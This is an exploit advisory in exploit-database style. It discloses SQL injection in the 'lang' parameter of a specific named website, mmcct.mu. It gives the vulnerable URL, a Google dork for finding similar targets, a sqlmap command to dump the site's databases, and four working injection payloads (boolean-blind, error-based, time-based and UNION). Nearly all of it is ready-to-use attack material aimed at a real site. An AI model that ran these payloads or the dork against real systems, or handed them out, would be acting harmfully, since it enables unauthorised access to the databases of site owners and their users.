|===========================================================================
| # Exploit Title : mmcct | SQL injection Vulnerability
|
| # Author : Ali Seddigh
|
| # Category : Web Application
|
| # Google Dork : inurl:members.php?lang=en
|
| # Software Link : www.mmcct.mu
|
| # Tested on : [ Windows ~> 10 ]
|
| # Vulnerable Path : https://www.mmcct.mu/pages/board_of_members.php?lang=en
|
| # Date : 2021-04-10
|===========================================================================
| << Demo on sqlmap >>
|
| # Vulnerability Parameter [lang]
| # sqlmap Query : python sqlmap.py -u "https://www.mmcct.mu/pages/board_of_members.php?lang=en" --dbs
|
|===========================================================================
# POC :
Parameter: lang (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lang=en' AND 7723=7723 AND 'LkKJ'='LkKJ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: lang=en' AND (SELECT 9975 FROM(SELECT COUNT(*),CONCAT(0x716a716271,(SELECT (ELT(9975=9975,1))),0x716b786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FthE'='FthE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: lang=en' AND (SELECT 3032 FROM (SELECT(SLEEP(5)))bdHq) AND 'Xbrs'='Xbrs
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: lang=-5281' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a716271,0x7359437a426369794d525a5a7a46666557477368564172425a434b62755877416d527a5850704a64,0x716b786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|===========================================================================
| # Discovered By : Ali Triplex
|===========================================================================